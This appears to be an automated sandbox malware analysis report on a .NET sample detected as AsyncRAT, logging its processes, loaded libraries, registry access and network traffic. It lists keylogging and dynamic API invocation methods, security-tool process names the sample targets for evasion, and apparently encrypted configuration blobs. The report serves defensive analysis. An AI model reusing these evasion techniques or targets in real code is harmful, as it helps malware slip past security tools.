'XDXpkYhRS8WGYilk/4IwGqgzIW11grYJw7JapruAB0xrqC6zbbRDY7NHOxwXP6zyR2jqXaTgLCmIXQJ46iLAWlDB/egix4ythub7pRzZagwovoc96IeBfhPbXB7ZDAjTudVyp5KzXzNEJPyNwRRaqe5hY7OuL8chiYEU5i9QS8mafScnga6mHFJ88BeNqyizx1wkkCUr79P0eVi5U4hr1Zww1JYUYdJvzoTCyQ99BZHPd4ihZ9kmvVnlwSPsvMD+Wa+uWhyGUb7TdQElgF33aOli+SCVoCY8VOjbwbo82c0ZggzMI5flBv31eHJLFM4xm1xsHN4gFgtK0d3U04OS/mH9d0wPWsPkcoX6tgsPPt/XhcjNHFUx2Q21w2fYK4fehfY+9Zysw2vF7cGN1CbkJ/E1wPxUtjovRcNfwC3owD25sYiZpz42G4rRx04xlM+FniB+z4UApadENJuDmJjKJU7RPD29eDSsgRdUEhGj4ISu7BH7ne08/RsPjOSKVNRtdLn08+gEZTxAV7ldzVtt9lHMXDcMsLxdcNrvWgdth7fCUO+caJQMG67RS7nFdh9woxNrnsL6QCv3DgAdanvn0+2+Hw6/IG+aEJZjoJfzpbNoCLSZ6dGJCXbtwN0/LGKzgdi4HlTQxqqDWKOoKC3eWypqoj/dU8VSNnQgvR9VKXscsADepAZN39+Hh3k1RZqwNqtFKD0C9jR67YeIItM3zZVxgdH7aQfL2wL/woUFccfr580vtt3b3bAd4uYxvQJRmucI6gnBOm12vso6IhxXiHP3QnoQp5SKaTOIvyfTAtC6qEy22uzLSD1YI8nXWapaqoPf9UcGHTBo5jQLUfsakL3zp6LtWFjd6+Gax35w06GtNb7YxJmuurxp+HNQukAcrEdxcsWy46FxahqwT1txNMIb3DaIv9AzvrYwJZ9kQWQ5DBTlEYJE2qhjcy5Qx09upxM/FN6VqzPJcT7jTBAWE6qsBHrVdvj2EDPKdpXQD/Me5Mudu7qtK9hlXnQHDM7GYXKygtfjN3gzJcZ0dQG5G/0vGeuUaLkP+H8TetwxOIhtq09lhHeuM8YFWt25yDZ+', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@25/59@8/5

Source: 0pF5Vz4xG4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0pF5Vz4xG4.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0pF5Vz4xG4.exe

Virustotal: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\0pF5Vz4xG4.exe "C:\Users\user\Desktop\0pF5Vz4xG4.exe"
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Jump to behavior

Source: 0pF5Vz4xG4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0pF5Vz4xG4.exe

Static file information: File size 6596488 > 1048576

Source: 0pF5Vz4xG4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0pF5Vz4xG4.exe, ClientSocket.cs

.Net Code: Invoke System.AppDomain.Load(byte[])

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 0pF5Vz4xG4.exe

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0pF5Vz4xG4.exe, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
Source: 0pF5Vz4xG4.exe, DInvokeCore.cs	Reference to suspicious API methods: DynamicAPIInvoke("ntdll.dll", "NtProtectVirtualMemory", typeof(Delegates.NtProtectVirtualMemory), ref Parameters)
Source: 0pF5Vz4xG4.exe, AntiProcess.cs	Reference to suspicious API methods: OpenProcess(1u, bInheritHandle: false, processId)

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

AV process strings found (often used to terminate AV products)

Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: MSASCui.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: procexp.exe
Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: MsMpEng.exe

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.45	part-0017.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
13.107.246.60	part-0032.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
216.58.206.36	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false

Private

IP
192.168.2.6

Contacted Domains

Name	IP	Active
part-0017.t-0009.t-msedge.net	13.107.246.45	true
part-0032.t-0009.t-msedge.net	13.107.246.60	true
www.google.com	216.58.206.36	true
js.monitor.azure.com	unknown	unknown
mdec.nelreports.net	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js	false	URL Reputation: safe URL Reputation: safe	unknown

AV Detection

Found malware configuration

Source: 0pF5Vz4xG4.exe

Multi AV Scanner detection for submitted file

Source: 0pF5Vz4xG4.exe

Virustotal: Detection: 50%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 78.3% probability

Machine Learning detection for sample

Source: 0pF5Vz4xG4.exe

Joe Sandbox ML: detected

Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon
Source: https://learn.microsoft.com/en-us/dotnet/framework/install/application-not-started?version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	HTTP Parser: No favicon

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2

Source: 0pF5Vz4xG4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 13.107.246.45 13.107.246.45
Source: Joe Sandbox View	IP Address: 13.107.246.60 13.107.246.60
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 2.19.104.72
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50
Source: unknown	TCP traffic detected without corresponding DNS query: 20.12.23.50

Source: global traffic	HTTP traffic detected: GET /mscc/lib/v2/wcp-consent.js HTTP/1.1Host: wcpstatic.microsoft.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /scripts/c/ms.jsll-3.min.js HTTP/1.1Host: js.monitor.azure.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://learn.microsoft.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C2sHvMB2cv7dmAa&MD=lE+CS+hL HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com

Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${encodeURIComponent(e)}&text=${encodeURIComponent(aS.replace("{credentialName}",t.title))}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.facebook.com/sharer/sharer.php?u=${s}" equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr	String found in binary or memory: href="https://www.linkedin.com/cws/share?url=${s}" equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </div>`}function mCe(t){return t.authenticationModes?t.authenticationModes.map(e=>e.type).includes("MSA"):!1}function fCe(t){let e=t.authenticationModes.find(o=>o.type==="MSA");return e?e.upn:null}function gCe(t){let e=t.authenticationModes.find(o=>o.type==="AAD");return e?e.upn:null}function hCe(t,e,o){return e??(Qt(t.email)?o:t.email)??""}function Dre(t){let e=mCe(t),o=e?fCe(t):null,n=e?null:gCe(t),r=hCe(t,o,n);return[e,r]}function bCe(t,e){let[o,n]=Dre(e);if(o){let i=t.querySelector("#report-msa-email-account");i.innerText=n}let r=t.querySelector("#opt-into-email-checkbox"),s=t.querySelector("#submitter-info");r.addEventListener("change",()=>{r.checked?s.hidden=!1:s.hidden=!0})}function _Ce(t){if(!t)return;let e=t.querySelector("#select-reason"),o=t.querySelector("#other-reason-textarea-container"),n=o.querySelector("textarea");!e\|\|!o\|\|!n\|\|(e.value==="Other"&&(o.hidden=!1,n.required=!0),e.addEventListener("change",()=>{e.value==="Other"\|\|e.value==="14"?(o.hidden=!1,n.required=!0,n.disabled=!1):(o.hidden=!0,n.required=!1,n.disabled=!0)}))}var Wt;function $re(){let t=document.getElementById("share-to-linkedin-profile");t&&t.addEventListener("click",e=>{let o=e.currentTarget,n=JSON.parse(o.dataset.credential),r=document.createElement("div"),s=vCe(n);S(s,r),Wt=new xe(r),Wt.show();let i=document.getElementById("share-to-feed-button"),a=document.getElementById("linkedin-feed-message"),l=new URL(decodeURI(i.getAttribute("href")));a.onchange=()=>{l.searchParams.set("text",a.value),i.setAttribute("href",l.toString())}})}function vCe(t){let e=encodeURI(`https://${location.host}/api/credentials/share/${_.data.userLocale}/${R.userName}/${t?.credentialId}?sharingId=${R.sharingId}`),o=1035,n=i=>new Date(i).getFullYear(),r=i=>new 